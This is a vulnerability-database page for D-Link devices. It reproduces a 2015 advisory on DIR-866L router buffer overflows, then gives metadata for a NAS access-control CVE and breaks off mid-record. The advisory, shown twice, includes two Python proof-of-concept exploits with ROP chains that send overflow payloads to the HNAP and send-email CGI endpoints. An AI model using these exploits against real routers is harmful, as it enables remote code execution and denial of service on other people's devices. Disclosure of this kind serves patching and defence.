Find a vulnerability
Search criteria
1419 vulnerabilities by dlink
VAR-201507-0645
Vulnerability from variot - Updated: 2026-04-11 00:04D-Link is an internationally renowned provider of network equipment and solutions, including a variety of router equipment. D-Link is a D-Link company dedicated to the research, development, production and marketing of local area networks, broadband networks, wireless networks, voice networks and related network equipment. A buffer overflow vulnerability exists in D-Link due to the program not performing correct boundary checks on user-submitted input. An attacker could use this vulnerability to execute arbitrary code in the context of an affected device and may also cause a denial of service. The following products are affected: D-Link Ethernet Broadband Router. ## Advisory Information
Title: DIR-866L Buffer overflows in HNAP and send email functionalities Vendors contacted: William Brown william.brown@dlink.com, Patrick Cline patrick.cline@dlink.com(Dlink) CVE: None
Note: All these security issues have been discussed with the vendor and vendor indicated that they have fixed issues as per the email communication. The vendor had also released the information on their security advisory pages http://securityadvisories.dlink.com/security/publication.aspx?name=SAP10060, http://securityadvisories.dlink.com/security/publication.aspx?name=SAP10061
However, the vendor has taken now the security advisory pages down and hence the information needs to be publicly accessible so that users using these devices can update the router firmwares.The author (Samuel Huntley) releasing this finding is not responsible for anyone using this information for malicious purposes.
Product Description
DIR866L -- AC1750 Wi-Fi Router. Mainly used by home and small offices.
Vulnerabilities Summary
Have come across 2 security issue in DIR866L firmware which allows an attacker on wireless LAN to exploit buffer overflow vulnerabilities in hnap and send email functionalities. An attacker needs to be on wireless LAN or management interface needs to be exposed on Internet to exploit HNAP vulnerability but it requires no authentication. The send email buffer overflow does require the attacker to be on wireless LAN or requires to trick administrator to exploit using XSRF.
Details
HNAP buffer overflow
import socket import struct import string import sys
BUFFER_SIZE = 2048
Observe this in a emulator/debugger or real device/debugger
buf = "POST /hnap.cgi HTTP/1.1\r\nHOST: 10.0.0.90\r\nUser-Agent: test\r\nContent-Length: 13\r\nSOAPAction:http://purenetworks.com/HNAP1/GetDeviceSettings\r\nHNAP_AUTH: test\r\nCookie: unsupportedbrowser=1AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEE" buf+="FFFF" buf+=struct.pack(">I",0x2abfc9f4) # s0 ROP 2 which loads S2 with sleep address buf+="\x2A\xBF\xB9\xF4" #s1 useless buf+=struct.pack(">I",0x2ac14c30) # s2 Sleep address buf+="DDDD" #s3 buf+=struct.pack(">I",0x2ac0fb50) # s4 ROP 4 finally loads the stack pointer into PC buf+=struct.pack(">I",0x2ac0cacc) # retn Loads s0 with ROP2 and ao with 2 for sleep buf+="XXXXFFFFFFFFFFFFFFFFFFFFGGGGGGGG" #This is the padding as SP is added with 32 bytes in ROP 1 buf+="XXXXFFFFFFFFFFFFFFFFFFFFGGGGGGGGGGGG" # This is the padding as SP is added with 36 bytes in ROP 2 buf+=struct.pack(">I",0x2abcebd0) # This is the ROP 3 which loads S4 with address of ROP 4 and then loads S2 with stack pointer address buf+="GGGGGGGGGGGGGGGG" buf+="AAAAAAAAAAAAAAAAAAAAA" # Needs a proper shell code Bad chars 1,0 in the first bit of hex byte so 1x or 0x buf+="GGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJ\r\n\r\n"+"test=test\r\n\r\n"
Bad chars \x00 - \x20
sleep address 2ac14c30
print "[+] sending buffer size", len(buf) s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect((sys.argv[1], 80)) s.send(buf) data = s.recv(BUFFER_SIZE) s.close() print "received data:", data
Send email buffer overflow
import socket import struct import string import sys
BUFFER_SIZE = 2048
Observe this in a emulator/debugger or real device/debugger
buf = "GET /send_log_email.cgi?test=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" buf+="1111" #s0 Loaded argument in S0 which is loaded in a0 buf+=struct.pack(">I",0x2ac14c30) #s4 Sleep address 0x2ac14c30 buf+="XXXX" buf+="FFFF" # s3 buf+="XXXX" buf+="BBBB" # s5 buf+="CCCC" # s6 buf+="DDDD" # s7 buf+="DDDD" # extra pad buf+=struct.pack(">I",0x2ABE94B8) # Retn address 2ABE94B8 ROP1 buf+="EEEBBBBBBBBBBBBBBBBBBBBBBBBBBBBB" # buf+="EEEBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB" # buf+="XXXX" # buf+="BBBBBBBBBBBBBBBB" #16 bytes before shellcode buf+="CCCCAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA HTTP/1.1\r\nHOST: 10.0.0.90\r\nUser-Agent: test\r\n\r\n"
print "[+] sending buffer size", len(buf) s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect((sys.argv[1], 80)) s.send(buf) data = s.recv(BUFFER_SIZE) s.close() print "received data:", data
Report Timeline
- April 26, 2015: Vulnerability found by Samuel Huntley and reported to William Brown and Patrick Cline.
- July 17, 2015: Vulnerability was fixed by Dlink as per the email sent by the vendor
- Nov 13, 2015: A public advisory is sent to security mailing lists.
Credit
This vulnerability was found by Samuel Huntley (samhuntley84@gmail.com)
Show details on source website{
"affected_products": {
"_id": null,
"data": [
{
"_id": null,
"model": "ethernet broadband router",
"scope": null,
"trust": 1.2,
"vendor": "dlink",
"version": null
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2015-05077"
},
{
"db": "CNVD",
"id": "CNVD-2015-05076"
}
]
},
"credits": {
"_id": null,
"data": "Samuel Huntley",
"sources": [
{
"db": "PACKETSTORM",
"id": "134372"
},
{
"db": "CNNVD",
"id": "CNNVD-201508-010"
},
{
"db": "CNNVD",
"id": "CNNVD-201508-011"
}
],
"trust": 1.3
},
"cvss": {
"_id": null,
"data": [
{
"cvssV2": [
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "CNVD",
"availabilityImpact": "PARTIAL",
"baseScore": 7.5,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 10.0,
"id": "CNVD-2015-05077",
"impactScore": 6.4,
"integrityImpact": "PARTIAL",
"severity": "HIGH",
"trust": 0.6,
"vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "CNVD",
"availabilityImpact": "PARTIAL",
"baseScore": 7.5,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 10.0,
"id": "CNVD-2015-05076",
"impactScore": 6.4,
"integrityImpact": "PARTIAL",
"severity": "HIGH",
"trust": 0.6,
"vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P",
"version": "2.0"
}
],
"cvssV3": [],
"severity": [
{
"author": "CNVD",
"id": "CNVD-2015-05077",
"trust": 0.6,
"value": "HIGH"
},
{
"author": "CNVD",
"id": "CNVD-2015-05076",
"trust": 0.6,
"value": "HIGH"
}
]
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2015-05077"
},
{
"db": "CNVD",
"id": "CNVD-2015-05076"
}
]
},
"description": {
"_id": null,
"data": "D-Link is an internationally renowned provider of network equipment and solutions, including a variety of router equipment. D-Link is a D-Link company dedicated to the research, development, production and marketing of local area networks, broadband networks, wireless networks, voice networks and related network equipment. \nA buffer overflow vulnerability exists in D-Link due to the program not performing correct boundary checks on user-submitted input. An attacker could use this vulnerability to execute arbitrary code in the context of an affected device and may also cause a denial of service. The following products are affected: D-Link Ethernet Broadband Router. ## Advisory Information\n\nTitle: DIR-866L Buffer overflows in HNAP and send email functionalities \nVendors contacted: William Brown \u003cwilliam.brown@dlink.com\u003e, Patrick Cline patrick.cline@dlink.com(Dlink)\nCVE: None\n\nNote: All these security issues have been discussed with the vendor and vendor indicated that they have fixed issues as per the email communication. The vendor had also released the information on their security advisory pages http://securityadvisories.dlink.com/security/publication.aspx?name=SAP10060, \nhttp://securityadvisories.dlink.com/security/publication.aspx?name=SAP10061\n\nHowever, the vendor has taken now the security advisory pages down and hence the information needs to be publicly accessible so that users using these devices can update the router firmwares.The author (Samuel Huntley) releasing this finding is not responsible for anyone using this information for malicious purposes. \n\n## Product Description\n\nDIR866L -- AC1750 Wi-Fi Router. Mainly used by home and small offices. \n\n## Vulnerabilities Summary\n\nHave come across 2 security issue in DIR866L firmware which allows an attacker on wireless LAN to exploit buffer overflow vulnerabilities in hnap and send email functionalities. An attacker needs to be on wireless LAN or management interface needs to be exposed on Internet to exploit HNAP vulnerability but it requires no authentication. The send email buffer overflow does require the attacker to be on wireless LAN or requires to trick administrator to exploit using XSRF. \n\n## Details\n\nHNAP buffer overflow\n----------------------------------------------------------------------------------------------------------------------\nimport socket\nimport struct\nimport string\nimport sys\n\nBUFFER_SIZE = 2048\n\n# Observe this in a emulator/debugger or real device/debugger\n\n\nbuf = \"POST /hnap.cgi HTTP/1.1\\r\\nHOST: 10.0.0.90\\r\\nUser-Agent: test\\r\\nContent-Length: 13\\r\\nSOAPAction:http://purenetworks.com/HNAP1/GetDeviceSettings\\r\\nHNAP_AUTH: test\\r\\nCookie: unsupportedbrowser=1AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEE\"\nbuf+=\"FFFF\"\nbuf+=struct.pack(\"\u003eI\",0x2abfc9f4) # s0 ROP 2 which loads S2 with sleep address\nbuf+=\"\\x2A\\xBF\\xB9\\xF4\" #s1 useless\nbuf+=struct.pack(\"\u003eI\",0x2ac14c30) # s2 Sleep address\nbuf+=\"DDDD\" #s3\nbuf+=struct.pack(\"\u003eI\",0x2ac0fb50) # s4 ROP 4 finally loads the stack pointer into PC\nbuf+=struct.pack(\"\u003eI\",0x2ac0cacc) # retn Loads s0 with ROP2 and ao with 2 for sleep \nbuf+=\"XXXXFFFFFFFFFFFFFFFFFFFFGGGGGGGG\" #This is the padding as SP is added with 32 bytes in ROP 1\nbuf+=\"XXXXFFFFFFFFFFFFFFFFFFFFGGGGGGGGGGGG\" # This is the padding as SP is added with 36 bytes in ROP 2\nbuf+=struct.pack(\"\u003eI\",0x2abcebd0) # This is the ROP 3 which loads S4 with address of ROP 4 and then loads S2 with stack pointer address\nbuf+=\"GGGGGGGGGGGGGGGG\"\nbuf+=\"AAAAAAAAAAAAAAAAAAAAA\" # Needs a proper shell code Bad chars 1,0 in the first bit of hex byte so 1x or 0x\nbuf+=\"GGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJ\\r\\n\\r\\n\"+\"test=test\\r\\n\\r\\n\"\n\n# Bad chars \\x00 - \\x20\n# sleep address 2ac14c30\n \nprint \"[+] sending buffer size\", len(buf)\ns = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\ns.connect((sys.argv[1], 80))\ns.send(buf)\ndata = s.recv(BUFFER_SIZE)\ns.close()\nprint \"received data:\", data\n\n----------------------------------------------------------------------------------------------------------------------\n\n# Send email buffer overflow\n----------------------------------------------------------------------------------------------------------------------\n\nimport socket\nimport struct\nimport string\nimport sys\n\nBUFFER_SIZE = 2048\n\n# Observe this in a emulator/debugger or real device/debugger\n\nbuf = \"GET /send_log_email.cgi?test=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\"\nbuf+=\"1111\" #s0 Loaded argument in S0 which is loaded in a0\nbuf+=struct.pack(\"\u003eI\",0x2ac14c30) #s4 Sleep address 0x2ac14c30 \nbuf+=\"XXXX\"\nbuf+=\"FFFF\" # s3\nbuf+=\"XXXX\"\nbuf+=\"BBBB\" # s5\nbuf+=\"CCCC\" # s6\nbuf+=\"DDDD\" # s7\nbuf+=\"DDDD\" # extra pad\nbuf+=struct.pack(\"\u003eI\",0x2ABE94B8) # Retn address 2ABE94B8 ROP1\nbuf+=\"EEEBBBBBBBBBBBBBBBBBBBBBBBBBBBBB\" # \nbuf+=\"EEEBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB\" # \nbuf+=\"XXXX\" # \nbuf+=\"BBBBBBBBBBBBBBBB\" #16 bytes before shellcode\nbuf+=\"CCCCAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA HTTP/1.1\\r\\nHOST: 10.0.0.90\\r\\nUser-Agent: test\\r\\n\\r\\n\"\n \nprint \"[+] sending buffer size\", len(buf)\ns = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\ns.connect((sys.argv[1], 80))\ns.send(buf)\ndata = s.recv(BUFFER_SIZE)\ns.close()\nprint \"received data:\", data\n\n----------------------------------------------------------------------------------------------------------------------\n\n## Report Timeline\n\n* April 26, 2015: Vulnerability found by Samuel Huntley and reported to William Brown and Patrick Cline. \n* July 17, 2015: Vulnerability was fixed by Dlink as per the email sent by the vendor\n* Nov 13, 2015: A public advisory is sent to security mailing lists. \n\n## Credit\n\nThis vulnerability was found by Samuel Huntley (samhuntley84@gmail.com)",
"sources": [
{
"db": "CNVD",
"id": "CNVD-2015-05077"
},
{
"db": "CNVD",
"id": "CNVD-2015-05076"
},
{
"db": "CNNVD",
"id": "CNNVD-201508-010"
},
{
"db": "CNNVD",
"id": "CNNVD-201508-011"
},
{
"db": "PACKETSTORM",
"id": "134372"
}
],
"trust": 2.25
},
"external_ids": {
"_id": null,
"data": [
{
"db": "BID",
"id": "76012",
"trust": 1.2
},
{
"db": "BID",
"id": "76014",
"trust": 1.2
},
{
"db": "CNVD",
"id": "CNVD-2015-05077",
"trust": 0.6
},
{
"db": "CNVD",
"id": "CNVD-2015-05076",
"trust": 0.6
},
{
"db": "CNNVD",
"id": "CNNVD-201508-010",
"trust": 0.6
},
{
"db": "CNNVD",
"id": "CNNVD-201508-011",
"trust": 0.6
},
{
"db": "DLINK",
"id": "SAP10061",
"trust": 0.1
},
{
"db": "DLINK",
"id": "SAP10060",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "134372",
"trust": 0.1
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2015-05077"
},
{
"db": "CNVD",
"id": "CNVD-2015-05076"
},
{
"db": "PACKETSTORM",
"id": "134372"
},
{
"db": "CNNVD",
"id": "CNNVD-201508-010"
},
{
"db": "CNNVD",
"id": "CNNVD-201508-011"
}
]
},
"id": "VAR-201507-0645",
"iot": {
"_id": null,
"data": true,
"sources": [
{
"db": "CNVD",
"id": "CNVD-2015-05077"
},
{
"db": "CNVD",
"id": "CNVD-2015-05076"
}
],
"trust": 2.2
},
"iot_taxonomy": {
"_id": null,
"data": [
{
"category": [
"IoT",
"Network device"
],
"sub_category": null,
"trust": 1.2
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2015-05077"
},
{
"db": "CNVD",
"id": "CNVD-2015-05076"
}
]
},
"last_update_date": "2026-04-11T00:04:01.946000Z",
"patch": {
"_id": null,
"data": [
{
"title": "Patch for multiple D-Link product UPnP buffer overflow vulnerabilities",
"trust": 0.6,
"url": "https://www.cnvd.org.cn/patchInfo/show/61829"
},
{
"title": "Patch for multiple D-Link product HTTP buffer overflow vulnerabilities",
"trust": 0.6,
"url": "https://www.cnvd.org.cn/patchInfo/show/61827"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2015-05077"
},
{
"db": "CNVD",
"id": "CNVD-2015-05076"
}
]
},
"references": {
"_id": null,
"data": [
{
"trust": 1.2,
"url": "http://www.securityfocus.com/bid/76012"
},
{
"trust": 1.2,
"url": "http://www.securityfocus.com/bid/76014"
},
{
"trust": 0.1,
"url": "http://securityadvisories.dlink.com/security/publication.aspx?name=sap10060,"
},
{
"trust": 0.1,
"url": "http://securityadvisories.dlink.com/security/publication.aspx?name=sap10061"
},
{
"trust": 0.1,
"url": "http://purenetworks.com/hnap1/getdevicesettings\\r\\nhnap_auth:"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2015-05077"
},
{
"db": "CNVD",
"id": "CNVD-2015-05076"
},
{
"db": "PACKETSTORM",
"id": "134372"
},
{
"db": "CNNVD",
"id": "CNNVD-201508-010"
},
{
"db": "CNNVD",
"id": "CNNVD-201508-011"
}
]
},
"sources": {
"_id": null,
"data": [
{
"db": "CNVD",
"id": "CNVD-2015-05077",
"ident": null
},
{
"db": "CNVD",
"id": "CNVD-2015-05076",
"ident": null
},
{
"db": "PACKETSTORM",
"id": "134372",
"ident": null
},
{
"db": "CNNVD",
"id": "CNNVD-201508-010",
"ident": null
},
{
"db": "CNNVD",
"id": "CNNVD-201508-011",
"ident": null
}
]
},
"sources_release_date": {
"_id": null,
"data": [
{
"date": "2015-08-03T00:00:00",
"db": "CNVD",
"id": "CNVD-2015-05077",
"ident": null
},
{
"date": "2015-08-03T00:00:00",
"db": "CNVD",
"id": "CNVD-2015-05076",
"ident": null
},
{
"date": "2015-11-16T17:36:22",
"db": "PACKETSTORM",
"id": "134372",
"ident": null
},
{
"date": "2015-07-23T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201508-010",
"ident": null
},
{
"date": "2015-07-17T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201508-011",
"ident": null
}
]
},
"sources_update_date": {
"_id": null,
"data": [
{
"date": "2015-08-03T00:00:00",
"db": "CNVD",
"id": "CNVD-2015-05077",
"ident": null
},
{
"date": "2015-08-03T00:00:00",
"db": "CNVD",
"id": "CNVD-2015-05076",
"ident": null
},
{
"date": "2015-08-04T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201508-010",
"ident": null
},
{
"date": "2015-08-04T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201508-011",
"ident": null
}
]
},
"threat_type": {
"_id": null,
"data": "remote",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201508-010"
},
{
"db": "CNNVD",
"id": "CNNVD-201508-011"
}
],
"trust": 1.2
},
"title": {
"_id": null,
"data": "Multiple D-Link Product UPnP Buffer Overflow Vulnerabilities",
"sources": [
{
"db": "CNVD",
"id": "CNVD-2015-05077"
}
],
"trust": 0.6
},
"type": {
"_id": null,
"data": "buffer overflow",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201508-010"
},
{
"db": "CNNVD",
"id": "CNNVD-201508-011"
}
],
"trust": 1.2
}
}
VAR-202604-0419
Vulnerability from variot - Updated: 2026-04-11 00:02A security flaw has been discovered in D-Link DNS-120, DNR-202L, DNS-315L, DNS-320, DNS-320L, DNS-320LW, DNS-321, DNR-322L, DNS-323, DNS-325, DNS-326, DNS-327L, DNR-326, DNS-340L, DNS-343, DNS-345, DNS-726-4, DNS-1100-4, DNS-1200-05 and DNS-1550-04 up to 20260205. Affected is the function Webdav_Access_List of the file /cgi-bin/file_center.cgi. Performing a manipulation of the argument cmd results in improper access controls. It is possible to initiate the attack remotely. The exploit has been released to the public and may be used for attacks. This vulnerability affects files. The method for exploiting the vulnerability has been made public and could be used to carry out attacks.There is a possibility that some of the information handled by the software may be leaked to the outside. However, the information handled by the software will not be rewritten. Furthermore, the software will not stop
Show details on source website{
"affected_products": {
"_id": null,
"data": [
{
"_id": null,
"model": "dnr-202l",
"scope": "lte",
"trust": 1.0,
"vendor": "dlink",
"version": "2026-02-05"
},
{
"_id": null,
"model": "dns-343",
"scope": "lte",
"trust": 1.0,
"vendor": "dlink",
"version": "2026-02-05"
},
{
"_id": null,
"model": "dns-322l",
"scope": "lte",
"trust": 1.0,
"vendor": "dlink",
"version": "2026-02-05"
},
{
"_id": null,
"model": "dnr-326",
"scope": "lte",
"trust": 1.0,
"vendor": "dlink",
"version": "2026-02-05"
},
{
"_id": null,
"model": "dns-320lw",
"scope": "lte",
"trust": 1.0,
"vendor": "dlink",
"version": "2026-02-05"
},
{
"_id": null,
"model": "dns-320",
"scope": "lte",
"trust": 1.0,
"vendor": "dlink",
"version": "2026-02-05"
},
{
"_id": null,
"model": "dns-1100-4",
"scope": "lte",
"trust": 1.0,
"vendor": "dlink",
"version": "2026-02-05"
},
{
"_id": null,
"model": "dns-315l",
"scope": "lte",
"trust": 1.0,
"vendor": "dlink",
"version": "2026-02-05"
},
{
"_id": null,
"model": "dns-345",
"scope": "lte",
"trust": 1.0,
"vendor": "dlink",
"version": "2026-02-05"
},
{
"_id": null,
"model": "dns-326",
"scope": "lte",
"trust": 1.0,
"vendor": "dlink",
"version": "2026-02-05"
},
{
"_id": null,
"model": "dns-340l",
"scope": "lte",
"trust": 1.0,
"vendor": "dlink",
"version": "2026-02-05"
},
{
"_id": null,
"model": "dns-327l",
"scope": "lte",
"trust": 1.0,
"vendor": "dlink",
"version": "2026-02-05"
},
{
"_id": null,
"model": "dns-120",
"scope": "lte",
"trust": 1.0,
"vendor": "dlink",
"version": "2026-02-05"
},
{
"_id": null,
"model": "dns-320l",
"scope": "lte",
"trust": 1.0,
"vendor": "dlink",
"version": "2026-02-05"
},
{
"_id": null,
"model": "dns-323",
"scope": "lte",
"trust": 1.0,
"vendor": "dlink",
"version": "2026-02-05"
},
{
"_id": null,
"model": "dns-1200-05",
"scope": "lte",
"trust": 1.0,
"vendor": "dlink",
"version": "2026-02-05"
},
{
"_id": null,
"model": "dns-321",
"scope": "lte",
"trust": 1.0,
"vendor": "dlink",
"version": "2026-02-05"
},
{
"_id": null,
"model": "dns-325",
"scope": "lte",
"trust": 1.0,
"vendor": "dlink",
"version": "2026-02-05"
},
{
"_id": null,
"model": "dns-1550-04",
"scope": "lte",
"trust": 1.0,
"vendor": "dlink",
"version": "2026-02-05"
},
{
"_id": null,
"model": "dns-726-4",
"scope": "lte",
"trust": 1.0,
"vendor": "dlink",
"version": "2026-02-05"
},
{
"_id": null,
"model": "dns-726-4",
"scope": null,
"trust": 0.8,
"vendor": "d link",
"version": null
},
{
"_id": null,
"model": "dns-340l",
"scope": null,
"trust": 0.8,
"vendor": "d link",
"version": null
},
{
"_id": null,
"model": "dns-315l",
"scope": null,
"trust": 0.8,
"vendor": "d link",
"version": null
},
{
"_id": null,
"model": "d-link dnr-326",
"scope": null,
"trust": 0.8,
"vendor": "d link",
"version": null
},
{
"_id": null,
"model": "dns-1550-04",
"scope": null,
"trust": 0.8,
"vendor": "d link",
"version": null
},
{
"_id": null,
"model": "d-link dns-325",
"scope": null,
"trust": 0.8,
"vendor": "d link",
"version": null
},
{
"_id": null,
"model": "dns-343",
"scope": null,
"trust": 0.8,
"vendor": "d link",
"version": null
},
{
"_id": null,
"model": "d-link dns-345",
"scope": null,
"trust": 0.8,
"vendor": "d link",
"version": null
},
{
"_id": null,
"model": "d-link dns-322l",
"scope": null,
"trust": 0.8,
"vendor": "d link",
"version": null
},
{
"_id": null,
"model": "dns-323",
"scope": null,
"trust": 0.8,
"vendor": "d link",
"version": null
},
{
"_id": null,
"model": "d-link dns-320lw",
"scope": null,
"trust": 0.8,
"vendor": "d link",
"version": null
},
{
"_id": null,
"model": "dns-1100-4",
"scope": null,
"trust": 0.8,
"vendor": "d link",
"version": null
},
{
"_id": null,
"model": "dns-326",
"scope": null,
"trust": 0.8,
"vendor": "d link",
"version": null
},
{
"_id": null,
"model": "d-link dns-327l",
"scope": null,
"trust": 0.8,
"vendor": "d link",
"version": null
},
{
"_id": null,
"model": "d-link dns-320",
"scope": null,
"trust": 0.8,
"vendor": "d link",
"version": null
},
{
"_id": null,
"model": "dns-1200-05",
"scope": null,
"trust": 0.8,
"vendor": "d link",
"version": null
},
{
"_id": null,
"model": "d-link dns-320l",
"scope": null,
"trust": 0.8,
"vendor": "d link",
"version": null
},
{
"_id": null,
"model": "dnr-202l",
"scope": null,
"trust": 0.8,
"vendor": "d link",
"version": null
},
{
"_id": null,
"model": "dns-120",
"scope": null,
"trust": 0.8,
"vendor": "d link",
"version": null
},
{
"_id": null,
"model": "dns-321",
"scope": null,
"trust": 0.8,
"vendor": "d link",
"version": null
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2026-010317"
},
{
"db": "NVD",
"id": "CVE-2026-5311"
}
]
},
"cve": "CVE-2026-5311",
"cvss": {
"_id": null,
"data": [
{
"cvssV2": [
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "cna@vuldb.com",
"availabilityImpact": "NONE",
"baseScore": 5.0,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 10.0,
"id": "CVE-2026-5311",
"impactScore": 2.9,
"integrityImpact": "NONE",
"severity": "MEDIUM",
"trust": 1.0,
"vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N",
"version": "2.0"
},
{
"acInsufInfo": null,
"accessComplexity": "Low",
"accessVector": "Network",
"authentication": "None",
"author": "OTHER",
"availabilityImpact": "None",
"baseScore": 5.0,
"confidentialityImpact": "Partial",
"exploitabilityScore": null,
"id": "JVNDB-2026-010317",
"impactScore": null,
"integrityImpact": "None",
"obtainAllPrivilege": null,
"obtainOtherPrivilege": null,
"obtainUserPrivilege": null,
"severity": "Medium",
"trust": 0.8,
"userInteractionRequired": null,
"vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N",
"version": "2.0"
}
],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"author": "cna@vuldb.com",
"availabilityImpact": "NONE",
"baseScore": 5.3,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"exploitabilityScore": 3.9,
"id": "CVE-2026-5311",
"impactScore": 1.4,
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"trust": 1.0,
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N",
"version": "3.1"
},
{
"attackComplexity": "Low",
"attackVector": "Network",
"author": "OTHER",
"availabilityImpact": "None",
"baseScore": 5.3,
"baseSeverity": "Medium",
"confidentialityImpact": "Low",
"exploitabilityScore": null,
"id": "JVNDB-2026-010317",
"impactScore": null,
"integrityImpact": "None",
"privilegesRequired": "None",
"scope": "Unchanged",
"trust": 0.8,
